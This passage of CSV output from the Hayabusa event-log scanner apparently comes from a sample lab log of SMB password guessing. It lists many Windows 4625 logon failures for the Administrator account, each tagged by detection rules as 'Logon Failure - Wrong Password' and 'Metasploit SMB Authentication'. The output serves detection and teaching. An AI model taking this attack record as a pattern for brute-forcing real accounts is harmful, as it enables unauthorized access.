Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
